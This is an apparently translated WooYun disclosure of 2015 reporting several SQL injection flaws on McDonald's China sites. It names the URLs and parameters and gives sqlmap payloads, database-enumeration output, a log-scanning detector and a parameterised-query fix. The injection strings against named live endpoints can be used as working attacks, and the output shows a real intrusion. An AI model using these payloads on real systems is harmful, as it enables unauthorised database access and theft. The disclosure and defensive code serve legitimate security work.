
Vulnerability summary

Defect ID: wooyun-2015-094206

Title: Multiple SQL injections at McDonald's, bundled

Vendor: McDonald's (China) Co., Ltd.

Author: Mr.light

Submitted: 2015-01-27 17:01

Fix deadline: 2015-03-13 17:02

Published: 2015-03-13 17:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor has confirmed

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-27: Details sent to the vendor, awaiting vendor handling
2015-01-29: Vendor has confirmed; details disclosed to the vendor only
2015-02-08: Details disclosed to core white hats and relevant domain experts
2015-02-18: Details disclosed to regular white hats
2015-02-28: Details disclosed to intern white hats
2015-03-13: Details disclosed to the public

Brief description:

Ate at McDonald's once.

Detailed description:

Ran a scan against McDonald's and found multiple SQL injection vulnerabilities; bundling them all into one report.
As follows:
http://rl.mcdonalds.com.cn/rl/cid.php?pid=
http://www1.mcdonalds.com.cn/list/quality/index.php?DocTypeId=61
http://rl.mcdonalds.com.cn/rl/index.php?province=&city=&type2=&address=&range=&curpage=1
http://www1.mcdonalds.com.cn/list/quality/cid.php?DocTypeId=

Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5109=5109 AND 'NysH'='NysH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: pid=' AND (SELECT 3550 FROM(SELECT COUNT(*),CONCAT(0x7165716871,(SELECT (CASE WHEN (3550=3550) THEN 1 ELSE 0 END)),0x7176706671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GtCQ'='GtCQ
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: pid=' UNION ALL SELECT CONCAT(0x7165716871,0x62664869745743486f6c,0x7176706671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pid=' AND SLEEP(5) AND 'PFWM'='PFWM


Place: GET
Parameter: DocTypeId
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
Payload: DocTypeId=MAKE_SET(1992=1992,61)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: DocTypeId=61 AND EXTRACTVALUE(7998,CONCAT(0x5c,0x71626f7871,(SELECT (CASE WHEN (7998=7998) THEN 1 ELSE 0 END)),0x716a6c6f71))


Place: GET
Parameter: province
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: province=(SELECT (CASE WHEN (7049=7049) THEN '' ELSE 7049*(SELECT 7049 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&city=&type2=&address=&range=&curpage=1
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: province=-3519 OR (SELECT 4147 FROM(SELECT COUNT(*),CONCAT(0x7162787971,(SELECT (CASE WHEN (4147=4147) THEN 1 ELSE 0 END)),0x7168766471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=&type2=&address=&range=&curpage=1
Type: UNION query
Title: MySQL UNION query (random number) - 8 columns
Payload: province=-9638 UNION ALL SELECT 8439,8439,8439,8439,CONCAT(0x7162787971,0x524d6b74755453744c4a,0x7168766471),8439,8439,8439#&city=&type2=&address=&range=&curpage=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: province=-1356 OR 8207=SLEEP(5)&city=&type2=&address=&range=&curpage=1
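For a defender who cannot change the code straight away, the payload families in the sqlmap output above (time-based SLEEP, error-based EXTRACTVALUE and FLOOR(RAND()), UNION SELECT, MAKE_SET parameter replacement, INFORMATION_SCHEMA probing, and the quote-plus-AND boolean form) are easy to spot in web-server access logs. The following Python is an added example, not part of the report or of the vendor's systems: it builds a few Common Log Format lines (the client IP, timestamp and the benign pid value A001 are constructed; the injected values are the ones quoted in the report's sqlmap output), URL-decodes each query parameter and tags it with the technique family it matches. The `SIGNATURES` list and the `scan_line`/`scan_log` functions are this example's own names.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Signatures derived from the payload families in the report's sqlmap output.
# Each is matched against the URL-decoded value of one query parameter.
SIGNATURES = [
    ("time-based", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("error-based", re.compile(r"\bEXTRACTVALUE\s*\(|\bFLOOR\s*\(\s*RAND\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("parameter-replace", re.compile(r"\bMAKE_SET\s*\(", re.I)),
    ("schema-probe", re.compile(r"\bINFORMATION_SCHEMA\b", re.I)),
    ("boolean-based", re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
]

# Request field of a Common Log Format line: "GET /path?query HTTP/1.1"
_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')


def _cl(path, params):
    """Build one constructed access-log line; IP and timestamp are made up."""
    return ('203.0.113.10 - - [27/Jan/2015:17:01:00 +0800] "GET %s?%s HTTP/1.1" 200 512'
            % (path, urlencode(params)))


# Constructed sample log: two benign requests, then values quoted from the report.
SAMPLE_LOG = [
    _cl("/rl/cid.php", {"pid": "A001"}),                          # benign (constructed id)
    _cl("/list/quality/index.php", {"DocTypeId": "61"}),          # benign, value from report
    _cl("/rl/cid.php", {"pid": "' AND 5109=5109 AND 'NysH'='NysH"}),
    _cl("/rl/cid.php", {"pid": "' AND SLEEP(5) AND 'PFWM'='PFWM"}),
    _cl("/list/quality/index.php", {"DocTypeId": "MAKE_SET(1992=1992,61)"}),
    _cl("/rl/index.php", {"province": "-1356 OR 8207=SLEEP(5)", "city": "",
                          "type2": "", "address": "", "range": "", "curpage": "1"}),
]


def scan_line(line):
    """Return [(parameter, [family, ...]), ...] for each suspicious parameter."""
    m = _REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # parse_qsl URL-decodes values, so encoded quotes and parentheses are restored
    for name, value in parse_qsl(query, keep_blank_values=True):
        families = [fam for fam, rx in SIGNATURES if rx.search(value)]
        if families:
            hits.append((name, families))
    return hits


def scan_log(lines):
    """Flatten hits across a log to (1-based line number, parameter, families)."""
    out = []
    for lineno, line in enumerate(lines, 1):
        for name, families in scan_line(line):
            out.append((lineno, name, families))
    return out


if __name__ == "__main__":
    for lineno, name, families in scan_log(SAMPLE_LOG):
        print("line %d: parameter %r looks like %s" % (lineno, name, ", ".join(families)))
```

Matching on the decoded parameter value rather than the raw URL is what lets the same six patterns catch both the quoted `pid` payloads and the bare numeric `province` and `DocTypeId` ones; a WAF or log pipeline that matches only the raw request line misses percent-encoded variants.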

Proof of vulnerability:

[*] information_schema
[*] mcdonalds_rl
[*] mcdonalds_rl_test
[*] mysql


+-----------------------------+
| admin_role |
| area |
| area_copy |
| faq |
| food |
| fooddocmanager |
| foodstandard |
| foodstandard_copy |
| foodsupplier |
| foodsupplier_copy |
| foodsupplieranddoctypematch |
| foodsupplierchild |
| foodsupplierchild_copy |
| foodsupplierchild_copy1 |
| foodsupplierdoc |
| foodsupplierdoc_copy |
| foodsupplierdoc_copy1 |
| foodsupplierdoc_copy2 |
| foodsupplierdoc_copy3 |
| foodsupplierdoc_copy4 |
| foodsupplierdoc_copy5 |
| foodsupplierdoc_copy6 |
| foodsupplierdoc_copy7 |
| foodsupplierdocstyle |
| foodsupplierdoctype |
| foodsupplierdoctype_copy |
| foodsupplierfile |
| foodsuppliergroup |
| foodsuppliergrouplist |
| foodsuppliergrouplist_copy |
| foodtype |
| log |
| mc_log |
| mc_mail_log |
| mc_mail_title |
| mc_manager |
| mc_manager_suppliergroup |
| mc_partner |
| mc_role |
| rl |
| rl2 |
| rl_copy_20150111 |
| temp |
| temp1 |
| temp2 |
| temp3 |
| temp4 |
| temp5 |
| temp52 |
| temp6 |
| temp7 |
| temp8 |
| temp9 |
+-----------------------------+


Database: mysql
[23 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+


Fix recommendation:

Filtering.
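The recommendation above is a single word; as an added illustration that is not code from the report, the vendor or the site, the following Python shows the defect the sqlmap output points to and the fix that removes it rather than filters around it. The string parameter `pid` is first spliced into the SQL text (the flaw) and then bound as a query parameter (the fix), and the numeric parameter `DocTypeId` is validated as digits only before use. SQLite stands in for MySQL; the table name `rl`, its columns, the sample rows and the known id `A001` are constructed assumptions. `PID_TRUE` is the boolean-based payload quoted in the report; `PID_FALSE` is its negated twin, added here only so a test can tell whether the boolean oracle still exists after the change.

```python
import re
import sqlite3

# Constructed sample rows standing in for a restaurant-locator table; the
# table and column names are assumptions, not taken from the report.
SAMPLE_ROWS = [
    ("A001", "Beijing", "Chaoyang"),
    ("A002", "Shanghai", "Pudong"),
    ("B003", "Guangzhou", "Tianhe"),
]

# Boolean-based payload for pid quoted from the report's sqlmap output, and
# the negated form (5110 instead of 5109) used only to probe for the oracle.
PID_TRUE = "' AND 5109=5109 AND 'NysH'='NysH"
PID_FALSE = "' AND 5109=5110 AND 'NysH'='NysH"
# Parameter-replace payload for DocTypeId quoted from the report.
DOCTYPE_PAYLOAD = "MAKE_SET(1992=1992,61)"


def make_db():
    """In-memory SQLite database standing in for the MySQL backend (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE rl (pid TEXT, province TEXT, city TEXT)")
    conn.executemany("INSERT INTO rl VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_pid_vulnerable(conn, pid):
    """The defect the report describes: the request value becomes part of the SQL text."""
    sql = "SELECT pid, province, city FROM rl WHERE pid = '" + pid + "'"
    return conn.execute(sql).fetchall()


def lookup_pid_hardened(conn, pid):
    """The fix: bind the value; the driver never lets it change the query's shape."""
    sql = "SELECT pid, province, city FROM rl WHERE pid = ?"
    return conn.execute(sql, (pid,)).fetchall()


_INT_RE = re.compile(r"^[0-9]{1,9}$")


def parse_doctype_id(raw):
    """For numeric parameters such as DocTypeId: accept digits only and return an int.
    Anything else, including a MAKE_SET(...) expression, is rejected before any query."""
    if not _INT_RE.match(raw):
        raise ValueError("DocTypeId must be a positive integer")
    return int(raw)


def oracle_visible(lookup, conn, known_pid="A001"):
    """True when an attacker-controlled condition changes the result set, i.e. the
    boolean-based blind oracle sqlmap reported still exists for this lookup function."""
    true_rows = lookup(conn, known_pid + PID_TRUE)
    false_rows = lookup(conn, known_pid + PID_FALSE)
    return true_rows != false_rows


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup exposes oracle:", oracle_visible(lookup_pid_vulnerable, db))
    print("hardened lookup exposes oracle:  ", oracle_visible(lookup_pid_hardened, db))
    print("DocTypeId=61 ->", parse_doctype_id("61"))
    try:
        parse_doctype_id(DOCTYPE_PAYLOAD)
    except ValueError as exc:
        print("DocTypeId payload rejected:", exc)
```

With the vulnerable lookup the true-condition request returns the `A001` row and the false-condition request returns nothing, which is exactly the difference sqlmap's boolean-based detection measures; with the bound parameter both requests are compared as literal strings and return nothing, so there is no oracle left to measure. The integer check covers the `DocTypeId` and `curpage` style of parameter, where binding alone is not enough if the application later builds a LIMIT or IN clause from the value.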

Copyright notice: please credit the source when reposting: Mr.light@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 7

Confirmed: 2015-01-29 00:30

Vendor reply:

The SQL injection problem on the website has been known for a long time; because the site runs under a hosting model, fixing the vulnerability will take some time.

Latest status:

None yet

